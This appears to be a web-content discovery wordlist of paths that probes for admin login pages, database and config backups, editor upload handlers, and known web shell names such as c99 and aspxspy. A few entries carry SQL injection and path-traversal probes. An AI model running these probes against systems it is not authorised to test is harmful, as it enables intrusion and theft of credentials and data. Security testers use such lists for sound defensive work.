/admindel.php
/admindel/
/admindelete.asp
/admindelete.aspx
/admindelete.php
/admindelete/
/adminedit
/adminedit.asp
/adminedit.aspx
/adminedit.php
/adminedit/
/AdminFile/
/AdminFile/Admin_Login.asp
/AdminFile/Admin_Login.aspx
/AdminFile/Admin_Login.php
/adminfso.asp
/adminfso.aspx
/adminfso.php
/adminin.asp
/adminin.aspx
/adminin.php
/adminindex
/adminindex.asp
/adminindex.aspx
/adminindex.php
/adminindex/
/administer
/administr8
/administr8.asp
/administr8.aspx
/administr8.html
/administr8.php
/administratie
/administration
/administration.asp
/administration.aspx
/administration.html
/administration.php
/AdministrAtion/
/administrator
/administrator.asp
/administrator.aspx
/administrator.html
/administrator.php
/administrator/
/administrator/account.asp
/administrator/account.aspx
/administrator/account.html
/administrator/account.php
/administrator/admin.asp
/administrator/admin.aspx
/administrator/admin.php
/administrator/index.asp
/administrator/index.aspx
/administrator/index.html
/administrator/index.php
/administrator/login.asp
/administrator/login.aspx
/administrator/login.html
/administrator/login.php
/administratoraccounts
/administrators
/Administrators/
/administrivia
/adminkey.asp
/adminkey.aspx
/adminkey.php
/adminlog.asp
/adminlog.aspx
/adminlog.php
/adminlogin
/adminlogin.asp
/adminlogin.aspx
/adminlogin.php
/adminlogin/
/admin-login/login.asp
/admin-login/login.aspx
/admin-login/login.php
/adminmain/
/adminmember.asp
/adminmember.aspx
/adminmember.php
/adminmember/
/adminn/
/adminpages
/adminpages/
/adminpanel.asp
/adminpanel.aspx
/adminpanel.html
/adminpanel.php
/adminpro
/adminpt/
/adminroot.asp
/adminroot.aspx
/adminroot.php
/admins
/admins.asp
/admins.aspx
/admins.html
/admins.php
/admins/
/admins_login.asp
/admins_login.aspx
/admins_login.php
/adminsys
/adminsys.asp
/adminsys.aspx
/adminsys.php
/admintab.asp
/admintab.aspx
/admintab.php
/admintab/
/admintghdhgfb.asp
/admintghdhgfb.aspx
/admintghdhgfb.php
/AdminTools
/adminuser
/adminuser.asp
/adminuser.aspx
/adminuser.php
/adminuser/
/adminuserlogin
/adminuserlogin.asp
/adminuserlogin.aspx
/adminuserlogin.php
/adminuserlogin/
/admlogin.asp
/admlogin.aspx
/admlogin.htm
/admlogin.php
/admout.asp
/admout.aspx
/admout.php
/AdmSystem
/admsystem.asp
/admsystem.aspx
/admsystem.php
/AdmSystem/
/adoconn.asp
/adoconn.aspx
/adoconn.php
/ads
/ads/
/adsense.txt
/ADSFGLKN32KFB/
/AdSystem
/AdSystem/
/adsystem/index.asp
/adsystem/index.aspx
/adsystem/index.php
/al
/al/
/amateur
/amateur/
/amateurs
/amateurs/
/amd
/amd/
/amd/index.asp
/amd/index.aspx
/amd/index.php
/amd/login.asp
/amd/login.aspx
/amd/login.php
/amd/super.asp
/amd/super.aspx
/amd/super.php
/amd_/admin.asp
/amd_/admin.aspx
/amd_/admin.php
/amd_/index.asp
/amd_/index.aspx
/amd_/index.php
/amd_/login.asp
/amd_/login.aspx
/amd_/login.php
/amd_/super.asp
/amd_/super.aspx
/amd_/super.php
/amd_007
/amd_007/
/amdin/
/ani
/ani/
/ani1
/ani1/
/anime
/anime/
/announcement.htm
/Apache/
/app
/app/
/apps
/apps/
/appz
/appz/
/arc
/arc/
/archive
/archive/
/archives
/archives/
/art.asp
/art.aspx
/art.php
/Article
/article.asp
/article.aspx
/article.php
/article/
/article/admin
/article/admin/admin.asp
/article/admin/admin.aspx
/article/admin/admin.php
/articleadmin.asp
/articleadmin.aspx
/articleadmin.php
/articleinfo.asp
/articleinfo.aspx
/articleinfo.php
/Articlelogin.asp
/Articlelogin.aspx
/Articlelogin.php
/asdf.asp
/asdf.aspx
/asdf.php
/asian
/asian/
/asians
/asians/
/asjobcom/index.asp
/asjobcom/index.aspx
/asjobcom/index.php
/asp
/asp.asp
/asp.aspx
/asp.php
/Asp/
/asp/admin/login.asp
/asp/admin/login.aspx
/asp/admin/login.php
/Asp_Admin
/Asp_Admin/
/asp99cms.asp
/asp99cms.aspx
/asp99cms.php
/aspadmin.asp
/aspadmin.aspx
/aspadmin.php
/ASPAdmin_A.asp
/ASPAdmin_A.aspx
/ASPAdmin_A.php
/asp-bin/
/aspcheck.asp
/aspcheck.aspx
/aspcheck.php
/aspcmd.asp
/aspcmd.aspx
/aspcmd.php
/asplogin.asp
/asplogin.aspx
/asplogin.php
/AspmyAdmin
/AspmyAdmin/
/aspxspy.aspx
/aspxspy.aspxx
/aspxspy.phpx
/ASPXspy2.aspx
/ASPXspy2.aspxx
/ASPXspy2.phpx
/auction.php?list=once&sql=1'
/authors.pwd
/auto
/auto.asp
/auto.aspx
/auto.php
/auto/
/autologin
/b
/b_admin.asp
/b_admin.aspx
/b_admin.php
/b2b_sysdata.asp
/b2b_sysdata.aspx
/b2b_sysdata.php
/Back
/back.asp
/back.aspx
/back.php
/Back/
/back/login.asp
/back/login.aspx
/back/login.php
/BackAdm
/backadm.asp
/backadm.aspx
/backadm.php
/BackAdm/
/BackAdmin
/BackAdmin/
/BackAdmins
/BackAdmins/
/BackEnd
/BackEnd/
/BackUp
/backup.asp
/backup.aspx
/backup.php
/backup.rar
/backup.zip
/backup/
/backups
/backups/
/banneradmin
/baoming.asp
/baoming.aspx
/baoming.php
/base64.asp
/base64.aspx
/base64.php
/basedadmin
/basedadmin.asp
/basedadmin/
/basedadmin/admin_login.asp
/basedadmin/admin_login.aspx
/basedadmin/admin_login.php
/bbadmin
/Bbs
/bbs.asp
/bbs.aspx
/bbs.php
/bbs/
/bbs/2fly_gift.php
/bbs/admin/login
/bbs/admin_index.asp
/bbs/admin_index.aspx
/bbs/admin_index.php
/bbs/admin_login.asp
/bbs/admin_login.aspx
/bbs/admin_login.php
/bbs/auction.php
/bbs/cdkey.php?
/bbs/Databackup/dvbbs.MDB
/bbs/diy.asp
/bbs/diy.aspx
/bbs/diy.php
/bbs/down_addsoft.asp
/bbs/down_addsoft.aspx
/bbs/down_addsoft.php
/bbs/down_picupfile.asp
/bbs/down_picupfile.aspx
/bbs/down_picupfile.php
/bbs/elogin.asp
/bbs/elogin.aspx
/bbs/elogin.php
/bbs/groupshow.php?agid=-2
/bbs/login.asp
/bbs/login.aspx
/bbs/login.php
/bbs/post_upfile.asp
/bbs/post_upfile.aspx
/bbs/post_upfile.php
/bbs/post_upload.asp
/bbs/post_upload.aspx
/bbs/post_upload.php
/bbs/reg_upload.asp
/bbs/reg_upload.aspx
/bbs/reg_upload.php
/bbs/saveup.asp
/bbs/saveup.aspx
/bbs/saveup.php
/bbs/upfile.asp
/bbs/upfile.aspx
/bbs/upfile.php
/bbs/upload_soft.asp
/bbs/upload_soft.aspx
/bbs/upload_soft.php
/Bbs1
/bbs1.asp
/bbs1.aspx
/bbs1.php
/Bbs1/
/bbs-data/
/bbsLogin.Asp
/bbsLogin.aspx
/bbsLogin.php
/bbslogin/
/bbss/
/bbsxp/
/bdunion.txt
/bestcollegepicks/
/bestcollegepicks/login.asp
/bestcollegepicks/login.aspx
/bestcollegepicks/login.php
/bigadmin
/bin
/bin/
/binaries
/binaries/
/binary
/binary/
/bizarre
/bizarre/
/black
/black/
/blog
/blog.asp
/blog.aspx
/blog.php
/blog/
/blogdata/
/blogDB/
/blogindex
/bm/chkadmin.asp
/bm/chkadmin.aspx
/bm/chkadmin.php
/book
/book.asp
/book.aspx
/book.php
/book/
/book/login.asp
/book/login.aspx
/book/login.php
/book1/
/book1/login.asp
/book1/login.aspx
/book1/login.php
/books
/books/
/boss/
/boss/admin.asp
/boss/admin.aspx
/boss/admin.php
/boss/admin_login.asp
/boss/admin_login.aspx
/boss/admin_login.php
/boss/login.asp
/boss/login.aspx
/boss/login.php
/boss/WebEditor/admin_login.asp
/boss/WebEditor/admin_login.aspx
/boss/WebEditor/admin_login.php
/boss/WebEditor/db/ewebeditor.mdb
/bottom.asp
/bottom.aspx
/bottom.php
/build.asp
/build.aspx
/build.php
/c
/c/
/c99.asp
/c99.aspx
/c99.php
/cadmins
/cao.asp
/cao.aspx
/cao.php
/caonima.asp
/caonima.aspx
/caonima.php
/careerfocus/
/careerfocus/Login.asp
/careerfocus/Login.aspx
/careerfocus/Login.php
/cat
/cat/
/catalog
/catalog/
/catalogs
/catalogs/
/ccms/
/ccms/index.asp
/ccms/index.aspx
/ccms/index.php
/ccms/login.asp
/ccms/login.aspx
/ccms/login.php
/ccp14admin
/cdkey.php?
/CEO.asp
/CEO.aspx
/CEO.php
/ceoadmin.asp
/ceoadmin.aspx
/ceoadmin.php
/cert/
/certif
/certif/
/certificate
/certificate/
/certificates
/certificates/
/certified
/certified/
/certify
/certify/
/cfg
/cfg.asp
/cfg.aspx
/cfg.php
/cfg/
/cgi
/cgi/
/cgibin
/cgi-bin
/cgibin/
/cgi-bin/
/cgi-bin/login.asp
/cgi-bin/login.aspx
/cgi-bin/login.php
/cgi-bin/System/Userlogin.asp
/cgi-bin/System/Userlogin.aspx
/cgi-bin/System/Userlogin.php
/change_password.asp
/change_password.aspx
/change_password.php
/changepass.asp
/changepass.aspx
/changepass.php
/changepwd.asp
/changepwd.aspx
/changepwd.php
/Char.asp
/Char.aspx
/Char.php
/Check
/check.asp
/check.aspx
/check.php
/Check/
/CheckLogin
/CheckLogin/
/chkadmin
/chkadmin.asp
/chkadmin.aspx
/chkadmin.php
/chkadmin/
/chklogin
/chklogin.asp
/chklogin.aspx
/chklogin.php
/chklogin/
/cipher.asp
/cipher.aspx
/cipher.php
/Cityadmin/
/cjcx/
/cjcx/login.asp
/cjcx/login.aspx
/cjcx/login.php
/cmd.asp
/cmd.aspx
/cmd.php
/cmdasp.asp
/cmdasp.aspx
/cmdasp.php
/cms/
/cmsadmin
/cmseditor/
/cmseditor/db/ewebeditor.mdb
/CmsEditor/Upload.asp 
/CmsEditor/Upload.aspx 
/CmsEditor/Upload.php 
/cn/
/cnkdata/
/cnlogin/
/cnzz/
/code
/code.asp
/code.asp.bak
/code.aspx
/code.aspx.bak
/code.php
/code.php.bak
/code/
/codes
/codes/
/coding
/coding/
/College
/College/
/college/index.asp
/college/index.aspx
/college/index.php
/Comm
/Comm/
/command.asp
/command.aspx
/command.php
/commentedit.htm
/common
/common.asp
/common.aspx
/common.php
/common/
/Conf
/conf.asp
/conf.aspx
/conf.php
/Conf/
/config
/config.asp
/config.asp.bak
/config.aspx
/config.aspx.bak
/config.inc
/config.php
/config.php.bak
/config/
/configuration
/configure
/conn.asp
/conn.asp.bak
/conn.aspx
/conn.aspx.bak
/conn.php
/conn.php.bak
/conn.txt
/connect/
/connection.asp
/connection.asp.bak
/connection.aspx
/connection.aspx.bak
/connection.php
/connection.php.bak
/connector.asp
/connector.aspx
/connector.php
/connstr.asp
/connstr.aspx
/connstr.php
/Console
/console.asp
/console.aspx
/console.php
/Console/
/Console/Login
/Console/Login/
/const.asp
/const.aspx
/const.php
/consts.asp
/consts.aspx
/consts.php
/content
/content/
/contents
/contents/
/Control/
/controlpanel
/controlpanel.asp
/controlpanel.aspx
/controlpanel.html
/controlpanel.php
/ControlPanel/
/count.asp
/count.aspx
/count.php
/count/
/count/supervise/Login.asp
/count/supervise/Login.aspx
/count/supervise/Login.php
/count_admin
/count_admin.asp
/count_admin.aspx
/count_admin.php
/count_admin/
/Cp
/cp.asp
/cp.aspx
/cp.html
/cp.php
/Cp/
/cpanel
/cpanel_file
/cpgl/
/crack
/crack/
/cracks
/cracks/
/crackz
/crackz/
/create.asp
/create.aspx
/create.php
/Create_Commend.asp
/Create_Commend.aspx
/Create_Commend.php
/Create_Default.asp
/Create_Default.aspx
/Create_Default.php
/Create_jsNews.asp
/Create_jsNews.aspx
/Create_jsNews.php
/Create_jsSearch.asp
/Create_jsSearch.aspx
/Create_jsSearch.php
/Create_New.asp
/Create_New.aspx
/Create_New.php
/Create_Other.asp
/Create_Other.aspx
/Create_Other.php
/Create_SoftCate.asp
/Create_SoftCate.aspx
/Create_SoftCate.php
/Create_SoftList_All.asp
/Create_SoftList_All.aspx
/Create_SoftList_All.php
/Create_SoftList_Cate.asp
/Create_SoftList_Cate.aspx
/Create_SoftList_Cate.php
/crypto.asp
/crypto.aspx
/crypto.php
/cshell.asp
/cshell.aspx
/cshell.php
/css.asp
/css.aspx
/css.php
/customer_login
/cx/
/cxhd.asp
/cxhd.aspx
/cxhd.php
/cz_login.asp
/cz_login.aspx
/cz_login.php
/d
/d99.asp
/d99.aspx
/d99.php
/daemon.asp
/daemon.aspx
/daemon.php
/dama.asp
/dama.aspx
/dama.php
/darkst.asp
/darkst.aspx
/darkst.php
/data
/data.asp
/data.aspx
/data.php
/Data.project/
/data.rar
/data.zip
/data/
/Data_Backup.asp
/Data_Backup.aspx
/Data_Backup.php
/data_jk/
/Data_Return.asp
/Data_Return.aspx
/Data_Return.php
/DataBackup/
/databak.rar
/databak.zip
/database
/database.asp
/database.aspx
/database.php
/database.rar
/database.zip
/database/
/database/%23Database.mdb
/database/%23Database_bak.mdb
/database_administration
/databases.asp
/databases.aspx
/databases.php
/databases/
/Databases/0791idc.mdb
/DataCy/
/datashop.asp
/datashop.aspx
/datashop.php
/db.asp
/db.aspx
/db.php
/db/
/db/ewebeditor.mdb
/db_con.asp
/db_con.aspx
/db_con.php
/DB_UserData/
/dbase.asp
/dbase.aspx
/dbase.php
/dbase/
/dbb.asp
/dbb.aspx
/dbb.php
/dbconn.asp
/dbconn.aspx
/dbconn.php
/dbconn_logo.asp
/dbconn_logo.aspx
/dbconn_logo.php
/DbConnect.asp
/DbConnect.aspx
/DbConnect.php
/debug
/debug/
/decrypt.asp
/decrypt.aspx
/decrypt.php
/dede/
/dede_admin.txt
/dede_bbs/
/defalut.html
/Default
/default.asp
/default.asp.bak
/default.aspx
/default.aspx.bak
/default.htm
/default.php
/default.php.bak
/default/
/default_1.asp
/default_1.asp.bak
/default_1.aspx
/default_1.aspx.bak
/default_1.php
/default_1.php.bak
/default_admin.asp
/default_admin.aspx
/default_admin.php
/Default_Default.asp?
/Default_Default.aspx?
/Default_Default.php?
/default_Image.asp
/default_Image.aspx
/default_Image.php
/Default_index.asp
/Default_index.aspx
/Default_index.php
/default_login.asp
/default_login.aspx
/default_login.php
/default_right.asp
/default_right.aspx
/default_right.php
/default1.asp
/default1.asp.bak
/default1.aspx
/default1.aspx.bak
/default1.php
/default1.php.bak
/default2.asp
/default2.asp.bak
/default2.aspx
/default2.aspx.bak
/default2.php
/default2.php.bak
/del.asp
/del.aspx
/del.php
/del_admin.asp
/del_admin.aspx
/del_admin.php
/del_member.asp
/del_member.aspx
/del_member.php
/delete.asp
/delete.aspx
/delete.php
/delete/
/deletemember.asp
/deletemember.aspx
/deletemember.php
/denglu
/denglu.asp
/denglu.aspx
/denglu.php
/denglu/
/denglu/admin.asp
/denglu/admin.aspx
/denglu/admin.php
/devel.asp
/devel.aspx
/devel.php
/devel/
/dhtml
/dhtml/
/digshell0.asp
/digshell0.aspx
/digshell0.php
/digshell2.asp
/digshell2.aspx
/digshell2.php
/dir
/dir/
/directadmin
/dir-login
/dirs
/dirs/
/diy.asp
/diy.aspx
/diy.php
/diy3.asp
/diy3.aspx
/diy3.php
/dl
/dl.asp
/dl.aspx
/dl.php
/dl/
/dm.asp
/dm.aspx
/dm.php
/dns/
/do.asp
/do.aspx
/do.php
/doc
/doc/
/docs
/docs/
/door
/door/
/double
/double/
/down
/down.asp
/down.aspx
/down.htm
/down.php
/down/
/down/login
/down/login.asp
/down/login.aspx
/down/login.php
/down_addsoft.asp
/down_addsoft.aspx
/down_addsoft.php
/down_picupfile.asp
/down_picupfile.aspx
/down_picupfile.php
/down_picupload.asp
/down_picupload.aspx
/down_picupload.php
/download
/download.asp
/download.aspx
/download.php
/download/
/downloads
/downloads/
/downloadz
/downloadz/
/downlogin.asp
/downlogin.aspx
/downlogin.php
/driver
/driver/
/drivers
/drivers/
/dtest.asp
/dtest.aspx
/dtest.php
/dvbbs.asa
/dvbbs/
/dvbbs/down_addsoft.asp
/dvbbs/down_addsoft.aspx
/dvbbs/down_addsoft.php
/dvbbs/post_upfile.asp
/dvbbs/post_upfile.aspx
/dvbbs/post_upfile.php
/dvbbs/post_upload.asp
/dvbbs/post_upload.aspx
/dvbbs/post_upload.php
/dvbbs/reg_upload.asp
/dvbbs/reg_upload.aspx
/dvbbs/reg_upload.php
/dvbbs/saveup.asp
/dvbbs/saveup.aspx
/dvbbs/saveup.php
/dvbbs/upfile.asp
/dvbbs/upfile.aspx
/dvbbs/upfile.php
/dvbbs/upload_soft.asp
/dvbbs/upload_soft.aspx
/dvbbs/upload_soft.php
/dvboke.asp
/dvboke.aspx
/dvboke.php
/DvForum/
/dxxobbs/
/dxxobbs/upload.asp
/dxxobbs/upload.aspx
/dxxobbs/upload.php
/dxy/
/e
/e/
/EAdmin
/EAdmin/
/eadmin/login.asp
/eadmin/login.aspx
/eadmin/login.php
/edi/admin/login.asp
/edi/admin/login.aspx
/edi/admin/login.php
/Edit
/edit.asp
/edit.aspx
/edit.php
/edit/
/edit/admin_login.asp
/edit/admin_login.aspx
/edit/admin_login.php
/edit/db/ewebeditor.mdb
/EditBox/
/editmember.asp
/editmember.aspx
/editmember.php
/editmember/
/Editor
/editor/
/editor/admin_login.asp
/editor/admin_login.asp?
/editor/admin_login.aspx
/editor/admin_login.aspx?
/editor/admin_login.php
/editor/admin_login.php?
/editor/db/ewebeditor.mdb
/editor/editor/filemanager/upload/test.html
/editor/filemanager/browser/default/browser.html
/editor/filemanager/upload/test.html
/editor/upload.asp 
/editor/upload.aspx 
/editor/upload.php 
/edituser.asp
/edituser.aspx
/edituser.php
/edituser/
/elogin.asp
/elogin.aspx
/elogin.php
/email
/email.asp
/email.aspx
/email.php
/email/
/emails
/emails/
/emyuser_login.asp
/emyuser_login.aspx
/emyuser_login.php
/en_US
/en_US/
/encrypt.asp
/encrypt.aspx
/encrypt.php
/end.asp
/end.aspx
/end.php
/eneya/
/eneya888/
/enterprise/upfile.asp
/enterprise/upfile.aspx
/enterprise/upfile.php
/entry
/entry/
/err.asp
/err.aspx
/err.php
/error.asp
/error.aspx
/error.php
/esuper
/esuper/
/esuperadmin
/esuperadmin/
/event
/event/
/ew/
/eWeb/admin_login.asp
/eWeb/admin_login.aspx
/eWeb/admin_login.php
/eWeb/db/ewebeditor.mdb
/ewebedit/
/ewebedit/db/ewebeditor.mdb
/ewebedit/ewebeditor.asp
/ewebedit/ewebeditor.aspx
/ewebedit/ewebeditor.php
/eWebEditor
/ewebeditor.asp
/ewebeditor.asp?id=x&style=standard
/ewebeditor.aspx
/ewebeditor.aspx?id=x&style=standard
/ewebeditor.mdb
/ewebeditor.php
/ewebeditor.php?id=x&style=standard
/ewebeditor/
/eWebEditor/Admin
/eWebEditor/admin_login.asp
/eWebEditor/admin_login.aspx
/eWebEditor/admin_login.php
/ewebeditor/asp/browse.asp
/ewebeditor/asp/browse.aspx
/ewebeditor/asp/browse.php
/eWebEditor/db/ewebeditor.mdb
/eWebEditor_v280_Free/admin_login.asp
/eWebEditor_v280_Free/admin_login.aspx
/eWebEditor_v280_Free/admin_login.php
/eWebEditor_v280_Free/db/ewebeditor.mdb
/ewebeditor1013.asp
/ewebeditor1013.aspx
/ewebeditor1013.php
/ewebeitor.htm
/ewebsoft/admin_login.asp
/ewebsoft/admin_login.aspx
/ewebsoft/admin_login.php
/exit.asp
/exit.aspx
/exit.php
/eye2007/
/eye2007Admin_login.asp
/eye2007Admin_login.aspx
/eye2007Admin_login.php
/eye2008/
/eye2009/
/ezsqliteadmin
/f
/f/
/FCKeditor
/FCKeditor/
/FCKeditor/editor/
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.php
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspxx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.phpx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.asp
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.php
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
/fckeditor/editor/filemanager/browser/default/connectors/test.html
/fckeditor/editor/filemanager/browser/default/frmupload.html
/fckeditor/editor/filemanager/upload/test.html
/fdnews.asa
/fdnews.asp
/fdnews.aspx
/fdnews.php
/file
/file.asp
/file.aspx
/file.php
/file/
/fileadmin
/fileadmin.asp
/fileadmin.aspx
/fileadmin.html
/fileadmin.php
/filemanager/
/files
/files.asp
/files.aspx
/files.php
/files/
/fileup.asp
/fileup.aspx
/fileup.php
/fileupimg2.asp
/fileupimg2.aspx
/fileupimg2.php
/filez
/filez/
/final
/final/
/findaccount.asp
/findaccount.aspx
/findaccount.php
/findpassword.asp
/findpassword.aspx
/findpassword.php
/Fl_Web.asp
/Fl_Web.aspx
/Fl_Web.php
/food
/food/
/Foosun_Data/
/foot.asp
/foot.aspx
/foot.php
/forbook1.asp
/forbook1.aspx
/forbook1.php
/format.asp
/format.aspx
/format.php
/formslogin
/Forum
/forum.asp
/forum.aspx
/forum.php
/forum/
/forum/upfile.asp
/forum/upfile.aspx
/forum/upfile.php
/forumdata/cache/usergroup_0.asp
/forumdata/cache/usergroup_0.aspx
/forumdata/cache/usergroup_0.php
/fpv_admin/
/fpv_admin/admin.asp
/fpv_admin/admin.aspx
/fpv_admin/admin.php
/frame.asp
/frame.aspx
/frame.php
/free
/free/
/freepic
/freepic/
/freepics
/freepics/
/freeweb_admin.asp
/freeweb_admin.aspx
/freeweb_admin.php
/front
/front/
/FTB/
/ftp
/ftp.txt
/ftp/
/Fuck
/fuck.asa
/fuck.asp
/fuck.aspx
/fuck.php
/Fuck/
/fucks
/fucks/
/fuckyou.asp
/fuckyou.aspx
/fuckyou.php
/funciton.asp.bak
/funciton.aspx.bak
/funciton.php.bak
/function.asp
/function.aspx
/function.php
/Function/UploadProductPic.asp
/Function/UploadProductPic.aspx
/Function/UploadProductPic.php
/Fy_SqlX.Asp
/Fy_SqlX.aspx
/Fy_SqlX.php
/g
/g/
/g_admin.asp
/g_admin.aspx
/g_admin.php
/g_admin/
/gal
/gal/
/galleries
/galleries/
/gallery
/gallery/
/galls
/game
/game/
/games
/games/
/gamez
/gamez/
/Gas_login.asp
/Gas_login.aspx
/Gas_login.php
/Gb
/Gb/
/gb/register.asp
/gb/register.aspx
/gb/register.php
/gbook.asp
/gbook.aspx
/gbook.php
/gbook/
/gbook/login.asp
/gbook/login.aspx
/gbook/login.php
/geoip.inc
/get.htm
/getpass.asp
/getpass.aspx
/getpass.php
/GetPassword.asp
/GetPassword.aspx
/GetPassword.php
/GfEditor/
/gg/
/gg_login.asp
/gg_login.aspx
/gg_login.php
/ggfb.asp
/ggfb.aspx
/ggfb.php
/ggjdsd/
/girl
/girl.asp
/girl.aspx
/girl.php
/girl/
/girls
/girls.asp
/girls.aspx
/girls.php
/girls/
/girlz
/girlz/
/gl
/gl.asp
/gl.aspx
/gl.jsp
/gl.php
/gl/
/gl/adminlogin.asp
/gl/adminlogin.aspx
/gl/adminlogin.php
/gladmin.asp
/gladmin.aspx
/gladmin.aspxx
/gladmin.jsp
/gladmin.php
/gladmin.phpx
/gladmin/login.asp
/gladmin/login.aspx
/gladmin/login.php
/gldl.asp
/gldl.aspx
/gldl.php
/gllogin.asp
/gllogin.aspx
/gllogin.aspxx
/gllogin.jsp
/gllogin.php
/gllogin.phpx
/global.asa
/global.asp
/global.aspx
/global.inc
/global.mdb
/global.php
/global.txt
/globes_admin
/gly
/gly/
/gm/
/go.asp
/go.aspx
/go.php
/graph
/graph/
/graphic
/graphic/
/graphics
/graphics/
/graphs
/graphs/
/groupshow.php?agid=-2 order by 50 #
/gsjj.asp
/gsjj.aspx
/gsjj.php
/guan
/guan/guanli.asp
/guan/guanli.aspx
/guan/guanli.php
/guanli
/guanli.asp
/guanli.aspx
/guanli.php
/guanli/
/guanli/admin.asp
/guanli/admin.aspx
/guanli/admin.php
/guanli/denglu/
/guanli/index.asp
/guanli/index.aspx
/guanli/index.php
/guanli/login.asp
/guanli/login.aspx
/guanli/login.php
/guanli_admin/
/guanliadmin.asp
/guanliadmin.aspx
/guanliadmin.jsp
/guanliadmin.php
/guanli-cn.asp
/guanli-cn.aspx
/guanli-cn.php
/guanlilog.asp
/guanlilog.aspx
/guanlilog.jsp
/guanlilog.php
/guanlilogin.asp
/guanlilogin.aspx
/guanlilogin.jsp
/guanlilogin.php
/guanli-tw.asp
/guanli-tw.aspx
/guanli-tw.php
/guanliyuan
/guanliyuan.asp
/guanliyuan.aspx
/guanliyuan.jsp
/guanliyuan.php
/guanliyuan/
/guest/
/guest/login.asp
/guest/login.aspx
/guest/login.php
/GuestBook
/guestbook/
/guestbook/login.asp
/guestbook/login.aspx
/guestbook/login.php
/guestbook/man.asp
/guestbook/man.aspx
/guestbook/man.php
/guli/login.asp
/guli/login.aspx
/guli/login.php
/h
/h/
/hack.asa
/hack.asp
/hack.aspx
/hack.php
/hacker.asa
/hacker.asp
/hacker.aspx
/hacker.php
/hardcore
/hardcore/
/hate.asp
/hate.aspx
/hate.php
/head.asp
/head.aspx
/head.php
/health/
/hege.asp
/hege.aspx
/hege.php
/heiren.asp
/heiren.aspx
/heiren.php
/Hello
/hello.asp
/hello.aspx
/hello.php
/Hello/
/help
/help.txt
/help/
/hidden
/hidden/
/hide
/hide/
/home
/home/
/houtai
/houtai.asp
/houtai.aspx
/houtai.php
/houtai/
/houtai/admin.asp
/houtai/admin.aspx
/houtai/admin.php
/houtai/Admin_Login.asp
/houtai/Admin_Login.aspx
/houtai/Admin_Login.php
/houtaidenglu
/houtaidenglu/
/houtaiguanli
/houtaiguanli.asp
/houtaiguanli.aspx
/houtaiguanli.php
/houtaiguanli/
/hpwebjetadmin
/Hradmin/admin.asp
/Hradmin/admin.aspx
/Hradmin/admin.php
/ht
/ht.asp
/ht.aspx
/ht.php
/ht/
/htdl
/htdl/
/htdoc
/htdoc/
/htdocs
/htdocs.asp
/htdocs.aspx
/htdocs.php
/htdocs/
/htgl
/htgl.asp
/htgl.aspx
/htgl.php
/htgl/
/htmedit/
/htmedit/admin_login.asp
/htmedit/admin_login.aspx
/htmedit/admin_login.php
/htmedit/db/ewebeditor.mdb
/html
/html/
/htmledit/
/HX_LOGIN.ASP
/HX_LOGIN.aspx
/HX_LOGIN.php
/HxData/
/HXMYDATABASE/
/HYTop.mdb
/hywindow/
/Hz@host!.asp 
/Hz@host!.aspx 
/Hz@host!.php 
/i
/i/
/id
/id/
/id_pass.asp
/id_pass.aspx
/id_pass.php
/idea.asp
/idea.aspx
/idea.php
/idea/
/ideas.asp
/ideas.aspx
/ideas.php
/ideas/
/ids
/ids/
/image
/image/
/ImageGallery.aspx?rif=/&cif=../&ftb=reProduct_content2
/ImageGallery.aspxx?rif=/&cif=../&ftb=reProduct_content2
/ImageGallery.phpx?rif=/&cif=../&ftb=reProduct_content2
/Images
/Images/
/images_dir
/images_dir/
/imagez
/imagez/
/img/
/img_upfile.asp
/img_upfile.aspx
/img_upfile.php
/inadmin.asp
/inadmin.aspx
/inadmin.php
/Inc
/inc.asp
/inc.asp.bak
/inc.aspx
/inc.aspx.bak
/inc.php
/inc.php.bak
/Inc/
/inc/config.asp
/inc/config.aspx
/inc/config.php
/inc/upload_flash.asp
/inc/upload_flash.aspx
/inc/upload_flash.php
/inc_config.asp
/inc_config.aspx
/inc_config.php
/incFiles/load_gg.asp
/incFiles/load_gg.aspx
/incFiles/load_gg.php
/include
/include.asp
/include.aspx
/include.php
/include/
/include/upfile.asp
/include/upfile.aspx
/include/upfile.php
/include/upfile_asp.asp
/include/upfile_asp.aspx
/include/upfile_asp.php
/include/upload.asp
/include/upload.aspx
/include/upload.php
/include/upload_asp.asp
/include/upload_asp.aspx
/include/upload_asp.php
/includeinc.asp
/includeinc.aspx
/includeinc.php
/includeinc//
/includes
/includes.asp
/includes.aspx
/includes.php
/includes/
/incoming.asp
/incoming.aspx
/incoming.php
/incoming/
/index
/index.asp
/index.asp.bak
/index.aspx
/index.aspx.bak
/index.htm
/index.html
/index.php
/index.php.bak
/index/
/index_admin
/index_admin.asp
/index_admin.aspx
/index_admin.php
/index_admin/
/index_Default.asp?
/index_Default.aspx?
/index_Default.php?
/index_manage
/index_manage.asp
/index_manage.aspx
/index_manage.php
/index_manage/
/index_test.asp
/index_test.aspx
/index_test.php
/index0.asp
/index0.aspx
/index0.php
/index1.asp
/index1.asp.bak
/index1.aspx
/index1.aspx.bak
/index1.php
/index1.php.bak
/indexadmin
/indexadmin.asp
/indexadmin.aspx
/indexadmin.php
/indexadmin/
/indexDefault.asp?
/indexDefault.aspx?
/indexDefault.php?
/indexximg/
/Indy_admin
/Indy_admin/
/InFile
/inFile.asp
/inFile.aspx
